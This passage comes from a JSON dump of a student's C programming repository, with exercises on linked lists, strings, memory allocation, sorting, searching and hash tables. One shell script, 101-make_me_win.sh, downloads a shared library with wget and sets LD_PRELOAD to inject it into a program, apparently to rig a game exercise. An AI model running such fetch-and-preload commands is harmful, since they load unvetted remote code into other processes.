integers.\n- 107-O - time complexity (average case) of a jump search in a singly linked list of size n, using step = sqrt(n)\n- 108-O - time complexity (average case) of a jump search in a skip list of size n, with an express lane using step = sqrt(n)\n" }, { "alpha_fraction": 0.8194444179534912, "alphanum_fraction": 0.8194444179534912, "avg_line_length": 26, "blob_id": "af98cc360813e67c60aeb1365a3e939620c899db", "content_id": "1feffd0220c962df9a814c3c055a7967d5c4aeb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 216, "license_type": "no_license", "max_line_length": 62, "num_lines": 8, "path": "/0x14-bit_manipulation/README.md", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "### BIT MANIPULATION\n\nThis repository is about Bit manipulation learning\n\nGeneral Learning Objectives:\n\nLook for the right source of information without too much help\nHow to manipulate bits and use bitwise operators\n" }, { "alpha_fraction": 0.6072041392326355, "alphanum_fraction": 0.6140651702880859, "avg_line_length": 20.592592239379883, "blob_id": "fb4331d13cee7349898df86f04a3ab2202ca9124", "content_id": "53f643a990652519c969f044750eace37fef8673", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 583, "license_type": "no_license", "max_line_length": 72, "num_lines": 27, "path": "/0x17-doubly_linked_lists/5-get_dnodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * get_dnodeint_at_index - get the given node index in a dlistin_t list.\n * @head: pointer to first node.\n * @index: node index looked.\n * Return: returns the nth node of a listint_t linked list.\n */\ndlistint_t *get_dnodeint_at_index(dlistint_t *head, unsigned int index)\n{\n\tunsigned int i;\n\tdlistint_t *cursor = NULL;\n\n\tif (head == NULL)\n\t\treturn (NULL);\n\tcursor = head;\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (index == 0)\n\t\t\treturn (cursor);\n\t\tcursor = cursor->next;\n\t\tif (i == (index - 1) && index != 0)\n\t\t{\n\t\t\treturn (cursor);\n\t\t}\n\t}\n\treturn (NULL);\n}\n" }, { "alpha_fraction": 0.4477498233318329, "alphanum_fraction": 0.4637681245803833, "avg_line_length": 16.958904266357422, "blob_id": "b13794bde8a5c7cbd9e16de0bf510c3adfb687e8", "content_id": "b7f0d2caf6cbd00a7a1e40f743e63f01aea2bb95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1311, "license_type": "no_license", "max_line_length": 64, "num_lines": 73, "path": "/0x0B-malloc_free/100-strtow.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * cwords - count number of words in a given string.\n * @str: given string.\n * @l: lenght of string.\n * Return: number of words.\n */\nint cwords(char *str, int l)\n{\n\tint i, count_w = 0;\n\n\tfor (i = 0; i < l; i++)\n\t{\n\t\tif (str[i] != ' ')\n\t\t{\n\t\t\tfor (; str[i] != ' '; i++)\n\t\t\t\t;\n\t\t\tcount_w++;\n\t\t}\n\t}\n\treturn (count_w);\n}\n\n/**\n * strtow - splits a string into words.\n * @str: input string.\n * Return: Pointer to array.\n */\nchar **strtow(char *str)\n{\n\tchar **p;\n\tint count_w = 0, count_c = 0, i, leng, x = 0, fr, j = 0, z = 0;\n\n\tif (str == NULL || *str == '\\0')\n\t{\n\t\treturn (NULL);\n\t}\n\tfor (leng = 0; str[leng] != '\\0'; 
leng++)\n\t\t;\n\tcount_w = cwords(str, leng);\n\tp = (char **)malloc((count_w + 1) * sizeof(char *));\n\tif (p == NULL || count_w == 0)\n\t{\n\t\tfree(p);\n\t\treturn (NULL);\n\t}\n\tfor (i = 0; i < leng; i++)\n\t{\n\t\tif (str[i] != ' ')\n\t\t{z = 1;\n\t\t\tfor (count_c = 0; str[i] != ' ' && str[i] != '\\0'; i++)\n\t\t\t\tcount_c++;\n\t\t\tp[x] = (char *)malloc((count_c + 1) * sizeof(char));\n\t\t\tif (p[x] == NULL)\n\t\t\t{\n\t\t\t\tfor (fr = 0; fr <= x; fr++)\n\t\t\t\t\tfree(p[fr]);\n\t\t\t\tfree(p);\n\t\t\t\treturn (NULL);\n\t\t\t}\n\t\t\tfor (j = 0; j < count_c; j++)\n\t\t\t\tp[x][j] = str[(i - count_c) + j];\n\t\t\tp[x][j] = '\\0';\n\t\t\tx++;\n\t\t}\n\t}\n\tif (z != 1)\n\t\treturn (NULL);\n\tp[x] = NULL;\n\treturn (p);\n}\n" }, { "alpha_fraction": 0.48910412192344666, "alphanum_fraction": 0.5157384872436523, "avg_line_length": 11.90625, "blob_id": "045bfad0f7610b8529c30bf7693c4ad9f2d67935", "content_id": "c0cfe884776a52960a54bd7a079664bc1291dda8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 413, "license_type": "no_license", "max_line_length": 55, "num_lines": 32, "path": "/0x02-functions_nested_loops/103-fibonacci.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include<stdio.h>\n/**\n * main - check the code for Holberton School students.\n *\n *\n * Return: Always 0.\n */\n\nint main(void)\n{\n\tlong int in, ln, iter, itnum, sum;\n\tlong int next;\n\n\titnum = 29;\n\tin = 1;\n\tln = 2;\n\tsum = 0;\n\n\tfor (iter = 0; iter <= itnum; iter++)\n\t{\n\t\tnext = in + ln;\n\t\tin = ln;\n\t\tln = next;\n\t\tif (next % 2 == 0)\n\t\t{\n\t\t\tsum = sum + next;\n\t\t}\n\t}\n\tsum = sum + 2;\n\tprintf(\"%ld\\n\", sum);\n\treturn (0);\n}\n" }, { "alpha_fraction": 0.6487985253334045, "alphanum_fraction": 0.6506469249725342, "avg_line_length": 21.54166603088379, "blob_id": "ff190e0a222e955aef130715eafbf0719d9f4272", "content_id": "c3759f02c9e74308476dd0c5bd6c69f09ddb04c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 541, "license_type": "no_license", "max_line_length": 74, "num_lines": 24, "path": "/0x1A-hash_tables/0-hash_table_create.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"hash_tables.h\"\n\n/**\n * hash_table_create - function that creates a hash table.\n * @size: size of the array.\n * Return: pointer to the newly created hash table or NULL if something go\n * wrong\n */\n\nhash_table_t *hash_table_create(unsigned long int size)\n{\n\thash_table_t *new_ht;\n\n\tif (size == 0)\n\t\treturn (NULL);\n\tnew_ht = malloc(sizeof(hash_table_t));\n\tif (new_ht == NULL)\n\t\treturn (NULL);\n\tnew_ht->size = size;\n\tnew_ht->array = calloc(size, sizeof(hash_node_t *));\n\tif (new_ht->array == NULL)\n\t\treturn (NULL);\n\treturn (new_ht);\n}\n" }, { "alpha_fraction": 0.5947046875953674, "alphanum_fraction": 0.5987780094146729, "avg_line_length": 20.34782600402832, "blob_id": "e91cafa5eee6c249c91aa942175926d8520bb7eb", "content_id": "2e1896fe54d52aa64a66e4fd7b4c64119f21f006", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 23, "path": "/0x12-singly_linked_lists/2-add_node.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * add_node - adds a new node at the 
beginning of a list_t list.\n * @head: pointer to firtst node.\n * @str: given string.\n * Return: the address of the new element, or NULL if it failed.\n */\nlist_t *add_node(list_t **head, const char *str)\n{\n\tlist_t *temp;\n\tint i;\n\n\ttemp = malloc(sizeof(list_t));\n\tif (temp == NULL)\n\t\treturn (NULL);\n\tfor (i = 0; str[i] != '\\0'; i++)\n\t\t;\n\ttemp->len = i;\n\ttemp->str = strdup(str);\n\ttemp->next = *head;\n\t*head = temp;\n\treturn (temp);\n}\n" }, { "alpha_fraction": 0.5856621861457825, "alphanum_fraction": 0.5953827500343323, "avg_line_length": 20.102563858032227, "blob_id": "6869153d0ba0f6d59d253568bb3e0cc9b3f989ab", "content_id": "8cbc1742cbf78df182c0e6ac643f2cf5c4c3285a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 823, "license_type": "no_license", "max_line_length": 72, "num_lines": 39, "path": "/0x13-more_singly_linked_lists/10-delete_nodeint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * delete_nodeint_at_index - deletes the node at index of a linked list.\n * @head: pointer to first node.\n * @index: given node index.\n * Return: return the address of the new node, or NULL if it failed or\n * if it is not possible to add the new node at index idx.\n */\nint delete_nodeint_at_index(listint_t **head, unsigned int index)\n{\n\tlistint_t *temp;\n\tlistint_t *cursor;\n\tunsigned int i;\n\n\tif (head == NULL)\n\t\treturn (-1);\n\tcursor = *head;\n\tfor (i = 0; cursor != NULL; i++)\n\t{\n\t\tif (i == (index - 1) && index != 0)\n\t\t{\n\t\t\ttemp = cursor->next;\n\t\t\tcursor->next = temp->next;\n\t\t\ttemp->next = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\telse if (index == 0)\n\t\t{\n\t\t\ttemp = *head;\n\t\t\t*head = temp->next;\n\t\t\ttemp->next = NULL;\n\t\t\tfree(temp);\n\t\t\treturn (1);\n\t\t}\n\t\tcursor = cursor->next;\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.49438202381134033, "alphanum_fraction": 0.5248796343803406, "avg_line_length": 17.323530197143555, "blob_id": "7b9cae01ba5204d6c5b7e8ed3b616c73b8128868", "content_id": "ef9cd685b4c101d1dae8b850c3b6ded44155bd39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 623, "license_type": "no_license", "max_line_length": 74, "num_lines": 34, "path": "/0x14-bit_manipulation/0-binary_to_uint.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * binary_to_uint - converts a binary number to an unsigned int.\n * @b: pointer to a string of 0 and 1 chars\n * Return: the converted number, or 0 if there is one or more chars in the\n * string b that is not 0 or 1, b is NULL.\n */\nunsigned int binary_to_uint(const char *b)\n{\n\tint i, len, e;\n\tunsigned int res = 0;\n\n\tif (b == NULL)\n\t\treturn (0);\n\n\te = 1;\n\n\tfor (len = 0; b[len] != '\\0'; len++)\n\t{\n\t\tif (b[len] != '1' && b[len] != '0')\n\t\t\treturn (0);\n\t}\n\n\tfor (i = (len - 1); i >= 0; i--)\n\t{\n\t\tif (i == (len - 1))\n\t\t\te = 1;\n\t\telse\n\t\t\te *= 2;\n\t\tres = res + ((b[i] - '0') * e);\n\t}\n\treturn (res);\n}\n" }, { "alpha_fraction": 0.6164705753326416, "alphanum_fraction": 0.6235294342041016, "avg_line_length": 19.238094329833984, "blob_id": "afe732d391da3b82a90933131d16121fc00c5cc5", "content_id": "b3a9a9b5ab383ad03ff67f30b96f4556d65f75d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", 
"length_bytes": 425, "license_type": "no_license", "max_line_length": 68, "num_lines": 21, "path": "/0x0F-function_pointers/1-array_iterator.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stddef.h>\n#include <stdlib.h>\n/**\n * array_iterator - executes a function given as a parameter on each\n * element of an array.\n * @array: given array.\n * @size: size of the array.\n * @action: pointer to the function needed.\n */\nvoid array_iterator(int *array, size_t size, void (*action)(int))\n{\n\tsize_t i;\n\n\tif (array == NULL || action == NULL)\n\t\texit(98);\n\n\tfor (i = 0; i < size; i++)\n\t{\n\t\taction(array[i]);\n\t}\n}\n" }, { "alpha_fraction": 0.4658385217189789, "alphanum_fraction": 0.4989648163318634, "avg_line_length": 11.384614944458008, "blob_id": "6cebb5461edac351e20d429089622ac32ce46e19", "content_id": "aada3a8a499a5756c7ba788915d83b11a2468087", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 483, "license_type": "no_license", "max_line_length": 39, "num_lines": 39, "path": "/0x06-pointers_arrays_strings/100-print_number.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_number - print an int numbers.\n * @n: number tested\n * Return: Always 0.\n */\nvoid print_number(int n)\n{\n\tint dig = 0, tend = 1, iter = 1;\n\tunsigned int abs = n, numch, num;\n\n\tif (n < 0)\n\t{\n\t\t_putchar('-');\n\t\tabs = -n;\n\t}\n\telse\n\t{\n\t\tabs = n;\n\t}\n\tnum = abs;\n\n\twhile (num > 0)\n\t{\n\t\tnum /= 10;\n\t\tdig++;\n\t}\n\twhile (iter < dig)\n\t{\n\t\ttend *= 10;\n\t\titer++;\n\t}\n\twhile (tend >= 1)\n\t{\n\t\tnumch = (abs / tend) % 10;\n\t\t_putchar(numch + '0');\n\t\ttend /= 10;\n\t}\n}\n" }, { "alpha_fraction": 0.5212628841400146, "alphanum_fraction": 0.5393041372299194, "avg_line_length": 16.636363983154297, "blob_id": "9372bcd37181763ee21c8d02f52d794979d16e82", "content_id": "bc8ed40b41fdbfb24328a7fd17a5ec72b13bee4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1552, "license_type": "no_license", "max_line_length": 71, "num_lines": 88, "path": "/0x1B-sorting_algorithms/105-radix_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * cifra - function that return the value of the less significant digit\n * depending of var.\n * @var: LSD 1, 2, 3..etc\n * @value: value in the array\n * Return: the digit in the var position\n */\nint cifra(int value, int var)\n{\n\tint i;\n\n\tfor (i = 0; i < var - 1; i++)\n\t{\n\t\tvalue = value / 10;\n\t}\n\tvalue = value % 10;\n\treturn (value);\n}\n/**\n * radix_function - sort the array using a copy\n * @array: array to sort\n * @copy: copy of array\n * @var: LSD, position of digit\n * @size: size of array\n */\nvoid radix_function(int *array, int var, int size, int *copy)\n{\n\tint min = 10, i, k = 0, valor = 0, j;\n\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tvalor = cifra(array[i], var);\n\t\tif (valor < min)\n\t\t\tmin = valor;\n\t}\n\n\tfor (i = min; i < 10; i++)\n\t{\n\t\tfor (j = 0; j < (int)size && k < (int)size; j++)\n\t\t{\n\t\t\tvalor = cifra(array[j], var);\n\t\t\tif (valor == i)\n\t\t\t{\n\t\t\t\tcopy[k] = array[j];\n\t\t\t\tk++;\n\t\t\t}\n\t\t}\n\t}\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tarray[i] = copy[i];\n\t}\n\tprint_array(array, size);\n}\n/**\n * radix_sort - sort 
an array using radix algorithm\n * @array: array to sort\n * @size: size of array\n */\nvoid radix_sort(int *array, size_t size)\n{\n\tint max = 0, i, *copy, num = 1, var = 1;\n\n\tif (!array || size == 1)\n\t\treturn;\n\n\tcopy = malloc(sizeof(int) * (size - 1));\n\tif (!copy)\n\t\treturn;\n\tfor (i = 0; i < (int)size; i++)\n\t{\n\t\tcopy[i] = array[i];\n\n\t\tif (array[i] > max)\n\t\t\tmax = array[i];\n\t}\n\twhile (max > 9)\n\t{\n\t\tmax = max / 10;\n\t\tnum++;\n\t}\n\tfor (i = 0; i < num; i++, var++)\n\t{\n\t\tradix_function(array, var, size, copy);\n\t}\n\tfree(copy);\n}\n" }, { "alpha_fraction": 0.5946969985961914, "alphanum_fraction": 0.5946969985961914, "avg_line_length": 13.666666984558105, "blob_id": "233ce66263f092e1b9ce31dae6675888a021faea", "content_id": "51e5e6739ba299dc20ae76540a1973a15548d562", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 264, "license_type": "no_license", "max_line_length": 35, "num_lines": 18, "path": "/0x12-singly_linked_lists/4-free_list.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"lists.h\"\n/**\n * free_list - frees a list_t list.\n * @head: pointer to firtst node.\n */\nvoid free_list(list_t *head)\n{\n\tlist_t *cursor;\n\n\twhile (head != NULL)\n\t{\n\t\tcursor = head;\n\t\thead = head->next;\n\t\tfree(cursor->str);\n\t\tfree(cursor);\n\t}\n\tfree(head);\n}\n" }, { "alpha_fraction": 0.5749129056930542, "alphanum_fraction": 0.592334508895874, "avg_line_length": 15.882352828979492, "blob_id": "358538f461ff52c050a225a329e484fd249360cf", "content_id": "4e1d729cb3703a13b556e25a1e1de230cf9f31ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 287, "license_type": "no_license", "max_line_length": 62, "num_lines": 17, "path": "/0x02-functions_nested_loops/7-print_last_digit.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * print_last_digit - return the last digit of a number\n * @n: variable for input value and recursive when last digit.\n * Return: the las digit.\n */\n\nint print_last_digit(int n)\n{\n\tn = n % 10;\n\tif (n < 0)\n\t{\n\t\tn = n * -1;\n\t}\n\t_putchar('0' + n);\n\treturn (n);\n}\n" }, { "alpha_fraction": 0.5850144028663635, "alphanum_fraction": 0.5926993489265442, "avg_line_length": 14.772727012634277, "blob_id": "c0a91e35004998a4c351f5eaa30ccacd486793bb", "content_id": "fc6bc7400e0b6d58fa1d5c8c5d61b4cb2184bdd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 47, "num_lines": 66, "path": "/0x0F-function_pointers/3-op_functions.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <stdio.h>\n/**\n * op_add - function that add two integrers.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of adding both integrers.\n */\nint op_add(int a, int b)\n{\n\treturn (a + b);\n}\n\n/**\n * op_sub - function that substract.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of substraction.\n */\nint op_sub(int a, int b)\n{\n\treturn (a - b);\n}\n\n/**\n * op_mul - function that multiply.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of multiplication.\n */\nint op_mul(int a, int b)\n{\n\treturn (a * b);\n}\n\n/**\n * op_div - function that 
divide two integrers.\n * @a: first integrer.\n * @b: second integrer.\n * Return: result of divition.\n */\nint op_div(int a, int b)\n{\n\tif (b == 0)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(100);\n\t}\n\treturn (a / b);\n}\n\n/**\n * op_mod - function that calcs the module.\n * @a: first integrer.\n * @b: second integrer.\n * Return: the module number.\n */\nint op_mod(int a, int b)\n{\n\tif (b == 0)\n\t{\n\t\tprintf(\"Error\\n\");\n\t\texit(100);\n\t}\n\treturn (a % b);\n}\n" }, { "alpha_fraction": 0.7758620977401733, "alphanum_fraction": 0.7931034564971924, "avg_line_length": 57, "blob_id": "b6d51103d94b50011d5f1e23d20825c1f62db5ab", "content_id": "c382f9ce0c4bc71c0a1195597decde9905e0e514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 174, "license_type": "no_license", "max_line_length": 128, "num_lines": 3, "path": "/0x18-dynamic_libraries/101-make_me_win.sh", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#!/bin/bash\nwget -P /tmp/ https://raw.github.com/david-develop/holbertonschool-low_level_programming/master/0x18-dynamic_libraries/libran.so\nexport LD_PRELOAD=/tmp/libran.so\n" }, { "alpha_fraction": 0.5220779180526733, "alphanum_fraction": 0.5376623272895813, "avg_line_length": 18.25, "blob_id": "38ab87cdad4bab539b69da4c0397b7525953bc7f", "content_id": "c803b176fc0eab56a7e8b0c5fe4da9f859d3f104", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 770, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/0x0B-malloc_free/5-argstostr.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n#include <stdlib.h>\n#include <stdio.h>\n/**\n * argstostr - concatenates all the arguments of a program.\n * @ac: arguments counter.\n * @av: arguments vectors.\n * Return: Pointer to a new string, NULL if ac = 0 or av = 0 or fails malloc.\n */\nchar *argstostr(int ac, char **av)\n{\n\tchar *new_str;\n\tint i, j, cp, final_leng;\n\n\tfinal_leng = 0;\n\tcp = 0;\n\n\tif (ac == 0 || av == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; i < ac; i++)\n\t{\n\t\tfor (j = 0; av[i][j] != '\\0'; j++)\n\t\t\t;\n\t\tfinal_leng = final_leng + j;\n\t}\n\tnew_str = malloc(final_leng + ac + 1 * sizeof(char));\n\tif (new_str == NULL)\n\t\treturn (NULL);\n\n\tfor (i = 0; i < ac; i++)\n\t{\n\t\tfor (j = 0; av[i][j] != '\\0'; j++, cp++)\n\t\t\tnew_str[cp] = av[i][j];\n\t\tnew_str[cp] = '\\n';\n\t\tcp++;\n\t}\n\n\treturn (new_str);\n}\n" }, { "alpha_fraction": 0.4763636291027069, "alphanum_fraction": 0.4981818199157715, "avg_line_length": 12.095237731933594, "blob_id": "0e950bf07d93cee59e94cccf53d7c2de31bac259", "content_id": "52b40d29b368275e99b93f62e8e3da00ec16f8bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 275, "license_type": "no_license", "max_line_length": 37, "num_lines": 21, "path": "/0x05-pointers_arrays_strings/6-puts2.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * puts2 - print one char out of two.\n * @str: input string.\n *\n */\nvoid puts2(char *str)\n{\n\tint i = 0;\n\n\t/*count the lenght of the string*/\n\twhile (*(str + i) != '\\0')\n\t{\n\t\tif (i % 2 == 0)\n\t\t{\n\t\t\t_putchar(str[i]);\n\t\t}\n\t\ti++;\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.43421053886413574, 
"alphanum_fraction": 0.45394736528396606, "avg_line_length": 12.028571128845215, "blob_id": "a1e5b261b2af0359746999341498fa17e5fb22d7", "content_id": "3041079b71b3d9e5512d2d19027627f65c019d38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 456, "license_type": "no_license", "max_line_length": 41, "num_lines": 35, "path": "/0x05-pointers_arrays_strings/7-puts_half.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * puts_half - print only half of string.\n * @str: input string.\n *\n */\nvoid puts_half(char *str)\n{\n\tint leng = 0, h;\n\n\t/*count the lenght of the string*/\n\twhile (*(str + leng) != '\\0')\n\t{\n\t\tleng++;\n\t}\n\tif (leng % 2 == 0)\n\t{\n\t\th = leng / 2;\n\t\twhile (*(str + h) != '\\0')\n\t\t{\n\t\t\t_putchar(str[h]);\n\t\t\th++;\n\t\t}\n\t}\n\telse\n\t{\n\t\th = (leng + 1) / 2;\n\t\twhile (*(str + h) != '\\0')\n\t\t{\n\t\t\t_putchar(str[h]);\n\t\t\th++;\n\t\t}\n\t}\n\t_putchar('\\n');\n}\n" }, { "alpha_fraction": 0.5667396187782288, "alphanum_fraction": 0.5864332318305969, "avg_line_length": 17.280000686645508, "blob_id": "2f1269e027eb52d9d115838744dd0d011c84ea63", "content_id": "ccc76b758bc1e5a01f2d01354ddf42276a7e0543", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 457, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/0x06-pointers_arrays_strings/8-rot13.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * rot13 - encode the string to leet.\n * @s: given string.\n * Return: the string encoded.\n */\nchar *rot13(char *s)\n{\n\tint iter, i;\n\tchar a[] = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\";\n\tchar n[] = \"NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm\";\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 52; i++)\n\t\t{\n\t\t\tif (s[iter] == a[i])\n\t\t\t{\n\t\t\t\ts[iter] = n[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.3802816867828369, "alphanum_fraction": 0.4154929518699646, "avg_line_length": 18.363636016845703, "blob_id": "2019731b27abc4f5249850b507ad723071755ee3", "content_id": "707a8ff19f02f3c05e2360a5793de1eaa927a53c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 426, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/0x06-pointers_arrays_strings/7-leet.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n/**\n * leet - encode the string to leet.\n * @s: given string.\n * Return: the string encoded.\n */\nchar *leet(char *s)\n{\n\tint iter, i;\n\tchar a[] = {'a', 'A', 'e', 'E', 'o', 'O', 't', 'T', 'l', 'L'};\n\tchar n[] = {'4', '4', '3', '3', '0', '0', '7', '7', '1', '1'};\n\n\tfor (iter = 0; s[iter] != '\\0'; iter++)\n\t{\n\t\tfor (i = 0; i < 10; i++)\n\t\t{\n\t\t\tif (s[iter] == a[i])\n\t\t\t\ts[iter] = n[i];\n\t\t}\n\t}\n\treturn (s);\n}\n" }, { "alpha_fraction": 0.6469622254371643, "alphanum_fraction": 0.6535303592681885, "avg_line_length": 23.360000610351562, "blob_id": "cf1ffaec5e6644fb8d89960da4419ca4f0f33eda", "content_id": "46054bdd9361a5c875ddf5df75aea3c91ac3c4b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1218, "license_type": 
"no_license", "max_line_length": 74, "num_lines": 50, "path": "/0x1E-search_algorithms/1-binary.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"search_algos.h\"\n/**\n * print_arr - function that print array\n * @array: a pointer to the first element of the complete array\n * @left: firts index of subarray\n * @right: last index of subarray\n */\nvoid print_arr(int *array, size_t left, size_t right)\n{\n\tprintf(\"Searching in array: \");\n\tfor (; left < right; left++)\n\t{\n\t\tprintf(\"%d, \", array[left]);\n\t}\n\tprintf(\"%d\\n\", array[left]);\n}\n\n/**\n * binary_search - function that searches for a value in a sorted array of\n * integers using the Binary search algorithm\n * @array: a pointer to the first element of the array to search in\n * @size: the number of elements in array\n * @value: is the value to search for\n * Return: return the first index where value is located, If value is not\n * present in array or if array is NULL, your function must return -1\n */\n\nint binary_search(int *array, size_t size, int value)\n{\n\tsize_t left, right, middle;\n\n\tleft = 0;\n\tright = size - 1;\n\n\tif (array == NULL)\n\t\treturn (-1);\n\n\twhile (left < size)\n\t{\n\t\tprint_arr(array, left, right);\n\t\tmiddle = (left + right) / 2;\n\t\tif (array[middle] < value)\n\t\t\tleft = middle + 1;\n\t\telse if (array[middle] > value)\n\t\t\tright = middle - 1;\n\t\telse\n\t\t\treturn ((int)middle);\n\t}\n\treturn (-1);\n}\n" }, { "alpha_fraction": 0.5745682716369629, "alphanum_fraction": 0.587127149105072, "avg_line_length": 21.75, "blob_id": "8a9190a05c355256f380eaa66a30e0176c33e358", "content_id": "84047a592a731aa28ce904d734eadd3e071b071d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 637, "license_type": "no_license", "max_line_length": 64, "num_lines": 28, "path": "/0x06-pointers_arrays_strings/1-strncat.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"holberton.h\"\n\n/**\n * _strncat - concatenate two strings\n * @dest: the string where we want to append.\n * @src: the string from which n characters are going to append.\n * @n: maximum number of character to be appended.\n * Return: pointer to the dest string.\n */\nchar *_strncat(char *dest, char *src, int n)\n{\n\tint i = 0, iter_n = 0;\n\n\t/*count first string*/\n\twhile (dest[i] != '\\0')\n\t{\n\t\ti++;\n\t}\n\t/*add second string to the first until n and only to the '\\0'*/\n\tfor (iter_n = 0; iter_n < n && src[iter_n] != '\\0'; iter_n++)\n\t{\n\t\tdest[i] = src[iter_n];\n\t\ti++;\n\t}\n\t/* add '\\0' at the end */\n\tdest[i] = '\\0';\n\treturn (&(*dest));\n}\n" }, { "alpha_fraction": 0.5483993887901306, "alphanum_fraction": 0.5590701103210449, "avg_line_length": 17.609928131103516, "blob_id": "5bd8d76893eb91c89ce71181596f50c418785d4b", "content_id": "273f748fa82513dd566bd3628824c0e3420c451b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2624, "license_type": "no_license", "max_line_length": 73, "num_lines": 141, "path": "/0x1B-sorting_algorithms/106-bitonic_sort.c", "repo_name": "david-develop/holbertonschool-low_level_programming", "src_encoding": "UTF-8", "text": "#include \"sort.h\"\n/**\n * printarr - print the array sent\n * @array: array\n * @begin: begin of the array\n * @end: end of the array\n */\nvoid printarr(int *array, int begin, int end)\n{\n\tint i;\n\tchar 
